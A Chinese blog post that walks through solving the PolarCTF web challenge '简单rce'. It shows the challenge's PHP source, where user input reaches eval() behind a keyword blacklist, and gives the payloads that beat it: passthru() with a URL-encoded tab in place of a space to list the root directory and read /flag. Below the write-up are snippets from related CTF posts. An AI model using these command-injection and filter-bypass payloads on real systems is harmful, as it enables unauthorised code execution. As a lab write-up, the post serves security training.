polarctf-web-[简单rce]

已于 2025-05-16 22:58:24 修改
阅读量445 收藏 9
点赞数 6
分类专栏: polarctf靶场复现-web 文章标签: 网络安全 linux
于 2025-05-13 20:13:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74759151/article/details/147932731
版权

考点:

(1)RCE(eval函数)

(2)执行函数(passthru函数)

(3)/顶级(根)目录查看

(4)sort排序查看函数

题目来源:Polarctf-web-[简单rce]

解题:

代码审计

 <?php
 /*
 ​
 PolarD&N CTF
 ​
 */
 highlight_file(__FILE__);
 function no($txt){  # WAF:检测$txt是否匹配这些命令,如果不匹配则返回$txt(即执行)
     if(!preg_match("/cat|more|less|head|tac|tail|nl|od|vim|uniq|system|proc_open|shell_exec|popen| /i", $txt)){
     return $txt;}
    else{
 die("what's up");}}
 $yyds=($_POST['yyds']);
 if(isset($_GET['sys'])&&$yyds=='666'){  # 要求get传参sys,post传参yyds=666,满足则执行no($_GET['sys']
   eval(no($_GET['sys']));
   }
   else
     {echo "nonono";
 }
 ?> nonono

分析结果:post传参yyds=666,get传参sys,如果传递的sys绕过了WAF,则执行sys命令,可利用sys传参实现任意代码执行

由于未过滤执行函数passthru(),故可以利用该函数实现任意代码执行

(1)sys=passthru('ls');

查看当前路径下有什么文件,仅有一个index.php文件

(2)sys=passthru('sort%09index.php');

  • sort:Linux 系统命令,用于对文件内容排序并输出内容。

  • %09:URL 编码的 水平制表符(\t,在 Shell 中相当于空格。

查看index.php文件,该文件即为初始显示的前端页面,无利用点

(3)sys=passthru('ls%09/');

查看顶级目录(根目录)下有什么文件

看到存在可疑文件flag

(4)sys=passthru('sort%09/flag');

排序并输出flag文件

(5)也可以使用sys=passthru('vi%09/flag');

PolarCTF2024冬季赛-个人部分WP(misc+web
2301_79355407的博客
12-11 1743
PolarCTF2024冬季赛-个人部分WP(misc+web
WebPolarCTF2024秋季个人挑战赛wp
m0_74823983的博客
12-19 596
page=flag对应了./flag.php,文件后缀写死了是php。自己也写过对应的文章,把fastjson换成snakeyaml就行。经过测试发现题目会将…/替换为空,双写绕过可以目录穿越。访问./hidden/hidden.php。上传一个png文件抓包改php后缀。一句话木马插在准备好的图片末尾。CC6打spring内存马。后面发现是,鉴定为傻逼题。访问./hidden。一开始给了php代码。
polarctf-web-[rce1]
最新发布
m0_74759151的博客
05-16 244
本题考点:(1)RCE(exec函数) (2)空格绕过 (3)执行函数(exec函数) (4)闭合(ping命令闭合)
CTF-Polar靶场-Web题目记录
xuan_yu0的博客
01-30 386
通过御剑扫一下网站(dirsearch也行),得到/.index.php.swp如图。知道preg_match有个特性就是超出一定字符数量会直接返回true(好像是的)
PolarD&N-CTF-web方向-简单
J1ng_Hong的博客
12-06 3676
所以bp的方法就不行了。然后源码看了好久都没找到id=9的地方,并且我还尝试传入id这个参数。post传参一个yyds=666,这是不会被检测的。这就是说我们需要post一个名为xdmtql的变量,然后这个变量不能是数组。然后发现有一个index.php,然后发现根目录有一个flag的文件。然后发现了一个叫做/.index.php.swp的备份文件。这就说明,如果换行符应该是不会被检测的。虽然很多乱码,但是flag还是包含在里面的。要匹配 . ,请使用 \.。然后就得到了flag。然后就得到了flag。
PolarD&amp;N-CTF-web方向-中等_polarctf web 解题
2401_87034401的博客
09-11 1087
然后访问**/shell.php**发现木马被读入,我们用蚁剑连接一下:在根目录找到了flag。
PolarD&N-CTF-web方向-中等
J1ng_Hong的博客
12-12 2880
(由于发现中等题里面有许多新的知识点,所以特意拉了一个新的博客来展示)
polar CTF 简单rce
samRsa
01-03 906
polar CTF 简单rce 【代码】polar CTF 简单rce
polarctf靶场 【web】签到题、简单 rce、蜜雪冰城吉警店、到底给不给flag呢
m0_73981089的博客
04-24 2991
此时注意GET数组的值,$ _GET["flag"]=Polar​,而经过$_POST​的变量覆盖,​$ _GET =array(1) { ["flag"]=> string(4) "flag" } ​,故而最开始传GET参数时?并且value不能等于flag,若想输出执行到最后输出flag,那么变量覆盖时候不能将$flag 的值等于除flag 外的任意值,也就是说在foreach内的变量覆盖过程,需要实现。这样被解析之后,就是c=flag&flag=c。方法二:字符串转义绕过;
polarctf靶场【web】session文件包含、自由的文件上传系统、爆破、XFF、 rce1、iphone、ezupload
m0_73981089的博客
04-26 2446
session文件包含、文件包含、XXF伪造、rce、UA的修改、文件上传漏洞、爆破
Web】记录Polar靶场<简单>难度题一遍过(全)
m0_74824802的博客
12-25 1161
明天XYCTF开始,今天干啥也不是,过过签到八股吧。
polarctfwebrce
03-10
### PolarCTF Web RCE Challenge Overview PolarCTF challenges often involve exploiting vulnerabilities within web applications to achieve remote code execution (RCE). In the context provided, several ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8697
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
OpenHarmony 开源鸿蒙南向开发——linux下使用make交叉编译第三方库——nettle库
我是晚秋,我在这里,谢谢你的看见。
05-12 559
本文介绍了在Linux环境下为OpenHarmony开源鸿蒙南向开发配置交叉编译环境的过程。首先,需要下载并解压nettle-3.3.tar.gz文件,并创建build目录。接着,设置环境变量,包括OHOS_SDK路径和相关的编译器工具链。然后,通过配置make命令,指定目标平台为arm-linux-gnueabihf,并设置安装路径。最后,使用make -j4命令进行编译,并通过make install完成安装。整个过程涉及依赖库gmp的路径调整和编译参数的设置,确保第三方库能够成功交叉编译。
深入剖析 Linux 进程的睡眠与唤醒机制
Cheese_Y的博客
05-13 961
Linux 进程的睡眠与唤醒机制是操作系统实现高效资源管理和任务调度的基石。从基本概念到实现机制,再到实际应用与调试,这一机制贯穿于系统运行的各个环节。深入理解并熟练掌握这一机制,不仅有助于优化系统性能,还能在面对进程阻塞、资源争用等问题时快速定位和解决问题。随着 Linux 内核的不断演进,睡眠与唤醒机制也在持续优化,以适应日益复杂的应用场景和硬件环境。以上详细阐述了 Linux 进程睡眠和唤醒的相关内容。若你对其中某部分还想深入了解,或有其他技术方向想探讨,欢迎随时和我说。
Linux文件编程——write函数
weixin_45720999的博客
05-12 504
函数是一个系统调用,用于将数据从缓冲区写入文件描述符(file descriptor)指向的文件或设备。它是 Unix/Linux 系统编程中非常重要的底层 I/O 操作之一。,可以高效、可靠地完成文件 I/O 操作。在 Linux 文件编程中,
Linux干货(三)
2501_91732643的博客
05-14 862
从B站黑马程序员Linux课程摘选的学习干货,新手友好!若有侵权,会第一时间处理。目录前言1.which find命令1.which命令2.find命令2.grep wc 管道符1.grep命令2.wc命令3.管道符3.echo tail 重定向符1.echo命令2.`反引号符3.重定向符4.tail命令4.vi编译器1.vi/vim编辑器2.基础命令3.运行模式1.命令模式2.输出模式3.底线命令模式。
Linux sysvinit 系统启动
求变,从思想开始
05-12 625
智能座舱,车机仪表系统
[Linux]从零开始的STM32MP157 Busybox根文件系统构建
c858845275的博客
05-11 895
讲解了STM32MP157 使用Busybox构建根文件系统以及根文件系统挂载!
CTFHUB----web前置技能-rce
01-01
### CTFHUB Web 前置技能 RCE 挑战及解题思路 #### 远程命令执行简介 远程命令执行(Remote Command Execution, RCE),是指攻击者能够通过应用程序接口发送特定指令,在服务器端执行任意操作系统级别的命令。这种漏洞一旦被利用,可能导致整个系统的完全控制。 #### 发现潜在的RCE漏洞 当面对可能存在RCE漏洞的应用程序时,通常会寻找可以输入数据的地方,比如表单提交、URL参数等位置。如果这些地方的数据未经严格验证就直接用于构建并执行系统调用,则可能成为RCE攻击的目标[^1]。 #### 验证是否存在RCE漏洞 为了确认是否真的存在这样的安全风险,可以通过尝试注入一些简单的测试语句来观察响应情况。例如,在支持PHP环境的情况下,可以试着向目标页面传递如下payload: ```php <?php phpinfo(); ?> ``` 如果上述代码被执行并且返回了PHP配置信息,则说明确实存在未受保护的入口点允许外部传入的内容影响到内部逻辑处理流程。 #### 利用已知条件构造有效载荷 假设经过初步探测之后发现了某个变量可以直接参与到shell_exec()函数之中去,那么就可以精心设计一段能实现预期目的同时又不会引起怀疑的日志记录脚本作为最终的有效负载。这里给出一个简单例子用来获取当前目录下的文件列表: ```bash ls -al ``` 当然实际操作过程中还需要考虑更多因素,如编码方式转换、特殊字符转义等问题以确保成功绕过防护机制达到想要的效果。 #### 安全建议 对于开发者而言,预防此类问题的发生至关重要。应当遵循最小权限原则分配资源访问权;对所有来自客户端的信息都应做充分校验过滤后再参与后续运算过程;定期审查源码查找安全隐患及时修复补丁版本更新至最新状态等等措施均有助于减少遭受恶意侵害的可能性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值